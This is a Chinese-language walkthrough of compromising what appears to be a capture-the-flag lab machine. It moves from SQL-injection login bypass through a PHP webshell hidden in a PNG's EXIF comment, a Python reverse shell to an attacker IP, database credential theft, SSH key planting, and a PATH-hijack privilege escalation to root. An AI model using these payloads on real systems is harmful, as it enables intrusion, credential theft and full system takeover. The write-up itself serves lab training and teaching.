记一次多种漏洞组合利用突破内网管理员权限的过程

信息收集

1.端口扫描

发现存在22和80端口。

1762848442_6912eeba68f3e94a3b36e.png!small?1762848442893

1762848448_6912eec06aaa2ad91e211.png!small?1762848449436

2.SQL注入

发现存在SQL注入万能密码进行登录。

1762848461_6912eecd213838f1c87fa.png!small?1762848462881

存在文件上传

1762848465_6912eed148d90734d1f63.png!small?1762848466241

3生成图片马进行文件上传

使用exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' 1.png 生成一个图片马，图片在网上下一个.png格式的。

1762848477_6912eedd285adcd94576b.png!small?1762848477615

发现直接上传.png格式是无法上传成功的，将其改成1.php.png格式。再次进行上传。

1762848500_6912eef416364e1f62950.png!small?1762848500794

成功进行上传

1762848509_6912eefddb01b7e7512dd.png!small?1762848510648

漏洞利用：

1.命令执行

上传之后，发现可以执行命令。

1762848518_6912ef06e6c538dbeb9a2.png!small?1762848519855

2.反弹低权限shell

利用python3:ython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.4",8833));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'进行反弹shell，然后在浏览器进行访问

http://10.10.10.185/images/uploads/1.php.jpg?0=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.2",8833));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.4",8833));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

使用nc监听8833端口。然后在浏览器访问url地址，成功获得低权限shell。

1762848530_6912ef12e462b501aa23a.png!small?1762848531566

1762848537_6912ef19600bd799c33d8.png!small?1762848538222

权限提升：

1.获取数据库用户账号密码

在查看文件的过程中，发现存在db数据库文件。成功找到了数据库和密码。

1762848547_6912ef2309d6f5eed59b4.png!small?1762848548141

然后使用mysql进行登录。

1762848559_6912ef2fad5edd8f240fe.png!small?1762848561130

登录之后，直接获得了admin用户密码。

1762848565_6912ef357afee25c15041.png!small?1762848566400

2.ssh登录

使用su切换用户。成功找到第一个user.txt文件。

1762848574_6912ef3e78d3998d632b5.png!small?1762848575371

3.生成ssh公钥，写入公钥。

将公钥写入到远程服务器的authorized_keys文件。

echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3EQYtrsL4KEhFMWW1GH2RBKBfYWAxmAXdT/yF2/g3h/dvTjQfKx3HfKkhlBcQQBSp/6ZbeVXZW6bqGhQq+aKvjVOMoHA8/zKZ2SvB3Zt6ehAyiQeCnFeSB1Jou5bDdRsimz6J3XYniOpnGOqk2Ytv35HI5J4900T5GSAXr2InQgPt+94yn60uHBMB5ani5du+1pAxUJOQ+7i6/BdjGvCGwMh+rqyboEM9qRZJiO/hTcMxeMmQTP+iHS3sGuzQaj7KseJV8vjmdC76SLRLOJsMWob/CSytsh/PZhxpNUUmXZAD1eHhOGuos811PpZ3N3RoP7tDHWjr2Ee9evNp8vhMWgUU0HkWr++mpS8/a5cqi0DETPmmnU97EYpOQtDPXMHDyzihYc0OGYgNn4M4OCKcebid1vyhRRlib1UYQx6JKDxIBDeQM0LSbUx0T/qmsOYKOX1vwiTzCaZahRp+gJaiN5pTXMU4hcKOLalnk4urv4u1LOs5QpAWydIQluwCvZM=

1762848586_6912ef4aae65c4b0cc200.png!small?1762848587386

1762848595_6912ef53bd1194c8cbc6a.png!small?1762848596702

1762848613_6912ef658661a61a32bd0.png!small?1762848614012

4.ssh远程连接

使用本地ssh进行连接。

1762848816_6912f0307aa0dc9d113d9.png!small?1762848817070

5.远程文件传输

在github下载LinEnum.sh，然后本地开启80端口。

1762848627_6912ef736536abf5a01cf.png!small?1762848628021

6.使用LinEnum.sh脚本检测薄弱点

远程服务器成功下载到，然后使用脚本进行检测。

发现/bin/sysinfo -x权限很可疑，进行查看。

使用file进行查看，发现是64位的ELF。

1762848637_6912ef7d38d45c29c18c8.png!small?1762848638534

1762848654_6912ef8ecb3320f722b31.png!small?1762848660632

1762848659_6912ef93d5f959221618e.png!small?1762848660633

1762848663_6912ef9721deaac696013.png!small?1762848664012

7.提权

在本地的free文件写入提权脚本。

1762848681_6912efa90a6ae4504e58d.png!small?1762848681681

开启远程下载。

1762848690_6912efb2d122584aaf777.png!small

成功下载到free文件

1762848700_6912efbc072ee43f0de82.png!small?1762848701199

增加其执行权限，然后添加到环境变量当中。

export PATH="/dev/shm:$PATH"

执行/bin/sysinfo进行查询。

1762848710_6912efc678a99b6375a92.png!small?1762848713546

获取root权限

nc再次开启监听，然后成功获取到root权限。接着进入root目录，成功获取到root.txt文件。

1762848721_6912efd1654675699d952.png!small?1762848722320